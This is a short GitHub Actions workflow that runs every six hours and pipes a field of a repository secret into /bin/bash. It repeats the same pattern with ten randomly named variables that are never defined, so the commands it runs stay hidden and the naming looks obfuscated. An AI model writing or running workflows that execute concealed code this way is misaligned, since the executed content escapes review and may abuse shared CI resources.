name: zhenjiershui
on:
  workflow_dispatch:
  schedule:
    - cron: '19 5/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: zhenjiershui
        env:
          vc5: ${{ secrets.vc5 }}
        run: |
          echo $vc5 | jq -r .oxg9 | /bin/bash
          echo $hynbk0 | jq -r .v950 | /bin/bash
          echo $wej24799 | jq -r .vp830 | /bin/bash
          echo $mtb4 | jq -r .tnu6 | /bin/bash
          echo $kx2 | jq -r .nha36 | /bin/bash
          echo $xecl515 | jq -r .vrt47 | /bin/bash
          echo $yg32 | jq -r .l06 | /bin/bash
          echo $eyhl93169 | jq -r .grblo00432 | /bin/bash
          echo $wrr112 | jq -r .wdidr978 | /bin/bash
          echo $nkgx023 | jq -r .bhijr1 | /bin/bash
          echo $fyyhr25624 | jq -r .rufk16859 | /bin/bash

